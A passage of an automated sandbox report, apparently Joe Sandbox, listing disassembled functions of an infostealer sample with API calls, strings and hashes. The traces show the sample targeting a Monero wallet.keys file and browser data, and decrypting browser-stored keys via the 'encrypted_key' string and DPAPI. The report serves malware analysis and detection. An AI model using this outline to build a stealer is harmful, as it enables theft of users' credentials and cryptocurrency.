                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00361580,00360D92), ref: 0034F54C
                            • lstrlen.KERNEL32(00000000), ref: 0034F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 62375df1ab717f10dc45f1a4694310d7e8f1bc06b19b6d83348243c8b08f021c
                            • Instruction ID: 36dbaebc4388520166b3d2fccbfa92e985a396b84f61e4612c04282aacb8730c
                            • Opcode Fuzzy Hash: 62375df1ab717f10dc45f1a4694310d7e8f1bc06b19b6d83348243c8b08f021c
                            • Instruction Fuzzy Hash: 0D512471D106089ADB05FBB0DC56DED7778AF54301F408628FC16AB1A1EF346A0DEBA2
                            Function 003570D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0035718C
                            • s5, xrefs: 003572AE, 00357179, 0035717C
                            • s5, xrefs: 00357111
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s5$s5$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-867831089
                            • Opcode ID: 3d26d83006396b936540a1ae8c6f2d7a91f59e4b1c7b280dc3ff86739d2b2d2e
                            • Instruction ID: 215a41185d55fc525ecd6fc287644813186cfd3696f01fd809ca39f81b234322
                            • Opcode Fuzzy Hash: 3d26d83006396b936540a1ae8c6f2d7a91f59e4b1c7b280dc3ff86739d2b2d2e
                            • Instruction Fuzzy Hash: EE5190B0C042089BDB25EB90DC86FEEB774AF44305F1045A8EA067B1A1EB746E8CDF55
                            Function 00353560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 1564e527d9158e7899abf8dec5be71875e002c107f29281374247eec7dde0fd2
                            • Instruction ID: 1b2d65d924a23b1dacc5f048fff4cb12265ea72b591a5c8d6ec18772ff9c9f45
                            • Opcode Fuzzy Hash: 1564e527d9158e7899abf8dec5be71875e002c107f29281374247eec7dde0fd2
                            • Instruction Fuzzy Hash: E0416371D10108EBCB06EFE4D885EEE7778AF54305F008118E8167B260DB756A09DFA2
                            Function 00349CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
                              • Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
                              • Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F
                              • Part of subcall function 00349B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
                              • Part of subcall function 00349B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
                              • Part of subcall function 00349B60: LocalFree.KERNEL32(?), ref: 00349BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 9ed09f87fcfd9f66e0e5a20db72d38ee64eb38e9b39a88f2f1c87317c964ddfd
                            • Instruction ID: fc3686ce84564ed2aca6401f9405b400ac27e650a8627c8c39fcb1a0195820a1
                            • Opcode Fuzzy Hash: 9ed09f87fcfd9f66e0e5a20db72d38ee64eb38e9b39a88f2f1c87317c964ddfd
                            • Instruction Fuzzy Hash: 33311CB6D10209ABDF15DFE4DC85FEFB7B8AB48304F144519E905AB245EB30AA04CBA1
                            Function 00358680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003605B7), ref: 003586CA
                            • Process32First.KERNEL32(?,00000128), ref: 003586DE
                            • Process32Next.KERNEL32(?,00000128), ref: 003586F3
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • CloseHandle.KERNEL32(?), ref: 00358761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
                            • Instruction ID: 884bc5e85d8e1a08c01e7d8ef75084f831d6e7381baa8d3dce71939502e4f497
                            • Opcode Fuzzy Hash: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
                            • Instruction Fuzzy Hash: D0316D71901618ABDB26DF50DC41FEEB778FF49701F104299E90AB61A0EB306A49DFA1
                            Function 00357980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E00,00000000,?), ref: 003579B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003579B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00360E00,00000000,?), ref: 003579C4
                            • wsprintfA.USER32 ref: 003579F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: beebc83397a4202524c6a97196cf17de95ba8b6c79afd5c981577f8ee1e02d66
                            • Instruction ID: 3df4b24ac7bbc0598e9bcf968ddbcc3ecd79ec0b5dc047dc183055b798ac7785
                            • Opcode Fuzzy Hash: beebc83397a4202524c6a97196cf17de95ba8b6c79afd5c981577f8ee1e02d66
                            • Instruction Fuzzy Hash: A11118B2904118AADB149FCADD45BBEB7F8EB48B11F10411AFA05A2290E2395944DBB1
                            Function 0035C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0035C74E
                              • Part of subcall function 0035BF9F: __amsg_exit.LIBCMT ref: 0035BFAF
                            • __getptd.LIBCMT ref: 0035C765
                            • __amsg_exit.LIBCMT ref: 0035C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0035C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: e28b9827b308a1030df9ffd964f1012d673ab049ff04d6e3b2c9c83f327b4377
                            • Instruction ID: fe44353c6f4c49be72c6f3e362feee5a37b723ee2b247108d91eaccfb143dfa3
                            • Opcode Fuzzy Hash: e28b9827b308a1030df9ffd964f1012d673ab049ff04d6e3b2c9c83f327b4377
                            • Instruction Fuzzy Hash: 4BF09032910B109FD723BBB89C06F49B3A06F0472BF255149FC14AE5F2CB6459889E96
                            Function 00354F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00354F7A
                            • lstrcat.KERNEL32(?,00361070), ref: 00354F97
                            • lstrcat.KERNEL32(?,00FB9788), ref: 00354FAB
                            • lstrcat.KERNEL32(?,00361074), ref: 00354FBD
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
                              • Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
                              • Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
                              • Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 96a3196a79951ab889d2cb8bbeafa04cb7972da6c5a4b64911d10c939dd2942f
                            • Instruction ID: 5491a15656770b4064f3ee6a58cc519c49a4abe77bcf677c13552b5533449186
                            • Opcode Fuzzy Hash: 96a3196a79951ab889d2cb8bbeafa04cb7972da6c5a4b64911d10c939dd2942f
                            • Instruction Fuzzy Hash: 5121DD7690020467DB55FBB0DC46EED337CAB54300F004545BA49AA195EE7496CD9FA2